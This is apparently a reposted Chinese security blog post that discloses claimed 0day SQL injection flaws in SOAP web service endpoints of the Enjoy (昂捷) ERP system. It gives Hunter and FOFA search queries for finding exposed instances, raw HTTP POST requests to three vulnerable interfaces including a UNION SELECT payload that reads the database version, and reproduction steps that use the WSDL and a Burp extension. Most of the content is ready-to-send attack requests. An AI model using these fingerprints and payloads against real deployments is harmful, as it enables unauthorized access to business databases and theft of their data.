昂捷ERP多处接口存在SQL注入(0day)

渗透技巧 12个月前 admin
138 0 0

测绘指纹

hunter语法:web.body=”CheckSilverlightInstalled”

昂捷ERP多处接口存在SQL注入(0day)

fofa语法:body=”CheckSilverlightInstalled”

昂捷ERP多处接口存在SQL注入(0day)

系统特征

昂捷ERP多处接口存在SQL注入(0day)


SQL注入点1

http://xxx.xxx.xxx.xxx:8008/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1Host: xxx.xxx.xxx.xxx:8008Content-Type: text/xml; charset=utf-8Content-Length: 482SOAPAction: "http://tempuri.org/GetOSpById"
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetOSpById xmlns="http://tempuri.org/"><sId>string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj</sId></GetOSpById></soap:Body></soap:Envelope>

昂捷ERP多处接口存在SQL注入(0day)

昂捷ERP多处接口存在SQL注入(0day)

SQL注入点2

http://xxx.xxx.xxx.xxx:8008/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx

POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeSOAPAction: http://tempuri.org/GetLeaveReqByIdContent-Type: text/xml;charset=UTF-8Host: xxx.xxx.xxx.xxx:9001Content-Length: 316
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <tem:GetLeaveReqById> <!--type: string--> <tem:sId>gero et</tem:sId> </tem:GetLeaveReqById> </soapenv:Body></soapenv:Envelope>

昂捷ERP多处接口存在SQL注入(0day)

SQL注入点3

http://xxx.xxx.xxx.xxx:8008/EnjoyRMIS_WS/WS/POS/cwsoa.asmx

POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/GetOAByIdContent-Type: text/xml;charset=UTF-8Host: xxx.xxx.xxx.xxx:9006Content-Length: 276
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/"> <soap:Header/> <soap:Body> <tem:GetOAById> <!--type: string--> <tem:sId>gero et</tem:sId> </tem:GetOAById> </soap:Body></soap:Envelope>

复现步骤

访问漏洞点存在的地址

http://xxx.xxx.xxx.xxx:9012/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx

在地址后面加上?wsdl

http://xxx.xxx.xxx.xxx:8123/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx?wsdl

昂捷ERP多处接口存在SQL注入(0day)

使用wsdler拓展工具解析

昂捷ERP多处接口存在SQL注入(0day)

解析完成之后,即可对这些接口进行测试

昂捷ERP多处接口存在SQL注入(0day)

声明

本文所提供的技术文章信息仅供参考学习,由于传播、利用此技术信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。未经网络安全部门及相关部门允许,不得擅自使用本文所提供的信息进行任何攻击活动。

原文始发于微信公众号(银遁安全团队):昂捷ERP多处接口存在SQL注入(0day)

版权声明:admin 发表于 2023年11月22日 下午1:16。
转载请注明:昂捷ERP多处接口存在SQL注入(0day) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...